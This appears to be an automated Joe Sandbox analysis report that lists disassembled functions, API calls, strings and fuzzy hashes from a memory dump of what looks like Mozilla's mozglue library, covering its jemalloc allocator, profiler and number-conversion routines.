Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: 3A33BE71E0421A8FCB04CFA8C8806EDBBF2FF49304F2A4269D955AB755D731B945CBA4

Function 6C69ED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C69EE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C69EFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6A1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6A16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C6A1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6A1A3E

Strings

~qgl, xrefs: 6C69ED13
~qgl, xrefs: 6C69ED10

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qgl$~qgl
API String ID: 3693777188-195013810
Opcode ID: c7b5f901d571140b648af2b9b89460cb110a8a344c1705b3c65794b14a6a167c
Instruction ID: f18f2f36d3fa3e30ca0427fa01c71d3d573fc8a17b2a808b0a468c7be9df8c32
Opcode Fuzzy Hash: c7b5f901d571140b648af2b9b89460cb110a8a344c1705b3c65794b14a6a167c
Instruction Fuzzy Hash: 7EB31871E0421ACFCB14CFA8C890ADDB7B2BF49304F2581A9D55AAB745D730AD86CF94

Function 6C68FD00 Relevance: 31.4, APIs: 17, Strings: 3, Instructions: 1360memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6FE7B8), ref: 6C68FF81
LeaveCriticalSection.KERNEL32(6C6FE7B8), ref: 6C69022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C690240
EnterCriticalSection.KERNEL32(6C6FE768), ref: 6C69025B
LeaveCriticalSection.KERNEL32(6C6FE768), ref: 6C69027B

Strings

<jemalloc>, xrefs: 6C690D62, 6C690D76, 6C690DA7
: (malloc) Error in VirtualFree(), xrefs: 6C690D67, 6C690D7B, 6C690DAC
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C68FE99, 6C68FEB7, 6C68FED3, 6C690DB8, 6C690DD3, 6C6919B4

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3577267516
Opcode ID: 3a530e1f38452447404a73a51cf703e4662ae2034518fa3f3ffc7fde5b3a0fdc
Instruction ID: f70930e177fbe9a53521d31266bc98e79e34879b467efafae7bce057ee677c8c
Opcode Fuzzy Hash: 3a530e1f38452447404a73a51cf703e4662ae2034518fa3f3ffc7fde5b3a0fdc
Instruction Fuzzy Hash: 83C2E271A057428FD714CF28C580756BBE2BF8A328F28C66DE4698B7D5C771E801CB89

Function 6C6DE680 Relevance: 31.1, APIs: 22, Instructions: 3648COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00004014), ref: 6C6DE811
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DEAA8
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DEBD5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DEEF6
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DF223
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C6DF322
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6E0E03
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C6E0E54
memcpy.VCRUNTIME140(?,?,?), ref: 6C6E0EAE
memcpy.VCRUNTIME140(?,?,?), ref: 6C6E0ED4

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: f83808ce1cfe74831cb8573d7a4c920e3384d1a240c2c5e85e00f78ec364dcbf
Instruction ID: 79815ff90739e80c7a441c38da04722bcae248db6f3c0cecdf83736d6955c6b1
Opcode Fuzzy Hash: f83808ce1cfe74831cb8573d7a4c920e3384d1a240c2c5e85e00f78ec364dcbf
Instruction Fuzzy Hash: 9863A071E0525ACFCB04CFA8C8805DDFBB2FF89314F29826AD855AB745D730A946CB94

Function 6C6B3E50 Relevance: 28.8, APIs: 13, Strings: 3, Instructions: 765COMMON

Download Yara Rule

APIs

Part of subcall function 6C6D7770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(}>kl,?,?,?,6C6B3E7D,?,?), ref: 6C6D777C

tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C6B3F17
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6B3F5C
VerSetConditionMask.NTDLL ref: 6C6B3F8D
VerSetConditionMask.NTDLL ref: 6C6B3F99
VerSetConditionMask.NTDLL ref: 6C6B3FA0
VerSetConditionMask.NTDLL ref: 6C6B3FA7
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C6B3FB4

Strings

C>kl, xrefs: 6C6B3E93
nvd3d9wrap.dll, xrefs: 6C6B4466
nvinit.dll, xrefs: 6C6B4479

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
String ID: C>kl$nvd3d9wrap.dll$nvinit.dll
API String ID: 1189858803-463763140
Opcode ID: aa7b7f0893a4ab4dad80421791fd83b05b013f274ec2f9a944b2e599e18bdeaa
Instruction ID: 040e20483ff107fa5cb41f4a0191beb38901138a4dcf089566a708cc726a638e
Opcode Fuzzy Hash: aa7b7f0893a4ab4dad80421791fd83b05b013f274ec2f9a944b2e599e18bdeaa
Instruction Fuzzy Hash: 9F52E571614B494FDB14DF34C880ABB77E9AF86308F04092DD6929B792DB74F909CB68

Function 6C68FEF0 Relevance: 23.8, APIs: 13, Strings: 2, Instructions: 1294memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6FE7B8), ref: 6C68FF81
LeaveCriticalSection.KERNEL32(6C6FE7B8), ref: 6C69022D
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C690240
EnterCriticalSection.KERNEL32(6C6FE768), ref: 6C69025B
LeaveCriticalSection.KERNEL32(6C6FE768), ref: 6C69027B

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C68FE99, 6C68FEB7, 6C68FED3, 6C690DB8, 6C690DD3, 6C6919B4, 6C691A10
MOZ_CRASH(), xrefs: 6C690CA7

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocVirtual
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
API String ID: 618468079-3566792288
Opcode ID: b7d3739b1133b552aaceb016557cfb4e551870b6839d41aa0dcdbabf8c853c9b
Instruction ID: db459f9e4575aa06daea5aee3fb3c9dcb293da97bf97afb0cb5df7bc8fec0f8d
Opcode Fuzzy Hash: b7d3739b1133b552aaceb016557cfb4e551870b6839d41aa0dcdbabf8c853c9b
Instruction Fuzzy Hash: 98B2DD716097428FD714CF29C590756BBE1BF89328F28C66DE86A8F795C730E841CB89

Function 6C6C5600 Relevance: 22.0, APIs: 6, Strings: 6, Instructions: 950COMMON

Download Yara Rule

Strings

expected a Count entry, xrefs: 6C6C5AC3
schema, xrefs: 6C6C606D
ProfileBuffer parse error: %s, xrefs: 6C6C5AC8, 6C6C5CBB
expected a Time entry, xrefs: 6C6C5CB6
data, xrefs: 6C6C6131
name, xrefs: 6C6C5E79, 6C6C5E8F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
API String ID: 0-2712937348
Opcode ID: 977a293b99cf2d62092d474711b621890cf2ca01fbbeb8360cb173157ed71f0d
Instruction ID: da50742b0484dac167016eb8004eb801a6fe710476df3f6162934912d5e97dab
Opcode Fuzzy Hash: 977a293b99cf2d62092d474711b621890cf2ca01fbbeb8360cb173157ed71f0d
Instruction Fuzzy Hash: 4D923871A093418FD724CF19C49079ABBE1FFC9308F14891DE59A9B751DB30E849CB9A

Function 6C6C2E4E Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 579stringCOMMON

Download Yara Rule

APIs

MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C6C2ED3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C2EE7
MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6C6C2F0D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C3214
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6C3242
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C36BF

Strings

get , xrefs: 6C6C3205
MOZ_PROFILER_SYMBOLICATE, xrefs: 6C6C378D
set , xrefs: 6C6C36EC

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: strlen$AddressCode$DescribeDetailsFormat
String ID: MOZ_PROFILER_SYMBOLICATE$get $set
API String ID: 2257098003-3318126862
Opcode ID: dab2ebb4f52a2788e3ed37eb797664e6d9a9c8f254b46ea884082758949233c3
Instruction ID: 6e64b9447d487965180ee4187d565206391f4379331a62bfc3fec2c2c0a1cd50
Opcode Fuzzy Hash: dab2ebb4f52a2788e3ed37eb797664e6d9a9c8f254b46ea884082758949233c3
Instruction Fuzzy Hash: CB325E712083818FD724CF24C4906AEBBE2EFCA318F54892DE59987751DB31D94ACB5B

Function 6C6B7E10 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 403COMMON

Download Yara Rule

Strings

schema, xrefs: 6C6B81E3, 6C6B8311
vol, xrefs: 6C6B8207
data, xrefs: 6C6B8280, 6C6B83E1
name, xrefs: 6C6B7ECF, 6C6B8335
(pre-xul), xrefs: 6C6B7E88

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcpystrlen
String ID: (pre-xul)$data$name$schema$vol
API String ID: 3412268980-1895977016
Opcode ID: e686a3cad080045bf8ea30f4c07978db7c9333f476fbfaef4b4ec517ae766120
Instruction ID: f30f393dc6310050c389d891b8339c07d4a4f281719b9f8193316a75a57087b2
Opcode Fuzzy Hash: e686a3cad080045bf8ea30f4c07978db7c9333f476fbfaef4b4ec517ae766120
Instruction Fuzzy Hash: E5E170B1A053418BC710CF69884065BFBEAFFC9354F144A2DE895E7790DBB0DD098B99

Function 6C69D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D4F2
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D50B

Part of subcall function 6C67CFE0: EnterCriticalSection.KERNEL32(6C6FE784), ref: 6C67CFF6
Part of subcall function 6C67CFE0: LeaveCriticalSection.KERNEL32(6C6FE784), ref: 6C67D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D52E
EnterCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D690
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69D6A6
LeaveCriticalSection.KERNEL32(6C6FE7DC), ref: 6C69D712
LeaveCriticalSection.KERNEL32(6C6FE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C6AD1C5), ref: 6C69D751
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69D7EA

Strings

<jemalloc>, xrefs: 6C69D827
: (malloc) Error initializing arena, xrefs: 6C69D82C

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
String ID: : (malloc) Error initializing arena$<jemalloc>
API String ID: 2690322072-3894294050
Opcode ID: 181c8b0630294c635742edd4d71db6058ffad56d98f59d25de81f04213c28c91
Instruction ID: c9290e36a74f84c8237f0f851cbb09f29d182475257fbb5c39ab991d19909437
Opcode Fuzzy Hash: 181c8b0630294c635742edd4d71db6058ffad56d98f59d25de81f04213c28c91
Instruction Fuzzy Hash: 9691C771A047428FD714CF29C59076ABBE2FB85318F14893EE56AC7B81D730E845CB8A

Function 6C6D4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0), ref: 6C6D4EFF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4F2E
moz_xmalloc.MOZGLUE ref: 6C6D4F52
memset.VCRUNTIME140(00000000,00000000), ref: 6C6D4F62
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D52B2
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D52E6
Sleep.KERNEL32(00000010), ref: 6C6D5481
free.MOZGLUE(?), ref: 6C6D5498

Strings

(, xrefs: 6C6D5250

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: f86b4c46dd00106aacc29455883ef9a1f9c3a264dc1ba1d85c295492a3645e74
Instruction ID: 13d4f53225d1855a218a08d92532740bc4bff23103adabf64d8a2be343d5715b
Opcode Fuzzy Hash: f86b4c46dd00106aacc29455883ef9a1f9c3a264dc1ba1d85c295492a3645e74
Instruction Fuzzy Hash: CDF1C171A18B008FC716CF39C89062BB7F6AFD6384F05872EF856A7651DB319846CB85

Function 6C699E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C699EB8
LeaveCriticalSection.KERNEL32(?), ref: 6C699F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C699F34
LeaveCriticalSection.KERNEL32(?), ref: 6C69A823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69A83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C69A849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C69A8B1, 6C69A8D4, 6C69A8EF

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: 5d15674fb048263cbaddeaaea098d5dc94bce59364526cd6dde46e59adb4f697
Instruction ID: 5628c433997b0d252037248ed738eb53ab970d9012492076538b154da4f4b721
Opcode Fuzzy Hash: 5d15674fb048263cbaddeaaea098d5dc94bce59364526cd6dde46e59adb4f697
Instruction Fuzzy Hash: 3C726A72E156128FD704CF28C540615FBE1BF89728F29C76DE8699B792D335E842CB84

Function 6C6C2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C6C2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C6C2C61

Part of subcall function 6C674DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C674E5A
Part of subcall function 6C674DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C674E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6C2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C6C2E2D

Part of subcall function 6C6881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C6881DE

Strings

(root), xrefs: 6C6C354F
ProfileBuffer parse error: %s, xrefs: 6C6C2E3B
expected a Time entry, xrefs: 6C6C2E36

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: ec4da0afed784223a6327250c1d654ded6e3d743f50d6bd9e1b7d056855011a0
Instruction ID: 323de6c47007a62474a713327a51e6afa3120c5b4383c78c46a2b93eaefca42a
Opcode Fuzzy Hash: ec4da0afed784223a6327250c1d654ded6e3d743f50d6bd9e1b7d056855011a0
Instruction Fuzzy Hash: 7F91BE706087418FC724CF25C48469EB7E1EFCA358F10492DE99A8B750DB30D949CB5B

Function 6C6D9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6C6D9F3D
__aulldiv.LIBCMT ref: 6C6D9F77
__aullrem.LIBCMT ref: 6C6D9F8C
__aulldiv.LIBCMT ref: 6C6DA023

Strings

-Infinity, xrefs: 6C6D9E60, 6C6D9E7B
NaN, xrefs: 6C6D9EAB

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: d17a97185fb866d4d966626f90c8923901261ca128f0463ac1bcd35f95bc6464
Instruction ID: 6a71a9340cc990be034153f18a669e1b892ef60e38ec3e5460dce0d6d094e3ef
Opcode Fuzzy Hash: d17a97185fb866d4d966626f90c8923901261ca128f0463ac1bcd35f95bc6464
Instruction Fuzzy Hash: 4EC1C131E083198BDB14CFA8C8507DEB7B6FF89308F154529D405ABB81DB71AD4ACB99

Function 6C67D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 6C67DC7F
@, xrefs: 6C67DAF6
8, xrefs: 6C67DC08
, xrefs: 6C67DA88
1, xrefs: 6C67DBDD
-, xrefs: 6C67D7DD
0, xrefs: 6C67D852
9, xrefs: 6C67DE7F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: d9f5a783ac69c99476d0bd188282678eb3d0e20889cc8b405eb6f50c6cf1f6a9
Instruction ID: 512c6275944aba2dce9975039fb5f97430a8503be1e1e1f2693d34c58bf0309d
Opcode Fuzzy Hash: d9f5a783ac69c99476d0bd188282678eb3d0e20889cc8b405eb6f50c6cf1f6a9
Instruction Fuzzy Hash: F062BE7150C3458FE721CF29C09079EBBF2AF86358F184E0DE4E54BA91D3359885CBAA

Function 6C6E545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6E8A4B

Strings

~qgl, xrefs: 6C6E9459, 6C6E921F, 6C6E5703, 6C6E5740, 6C6E9269, 6C6E56C7, 6C6E948F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memset
String ID: ~qgl
API String ID: 2221118986-2435832519
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: ccd676033fa14efb58b84d1ecbe4bdd4162506bda8df82a94812d5ca6784a583
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: B2B10B72E0521ACFDB14CF68CC907D9B7B2EF89314F1902AAC549DB791E7309989CB94

Function 6C6E542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6E88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6E925C

Strings

~qgl, xrefs: 6C6E9459, 6C6E921F, 6C6E5703, 6C6E5740, 6C6E9269, 6C6E56C7, 6C6E948F

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
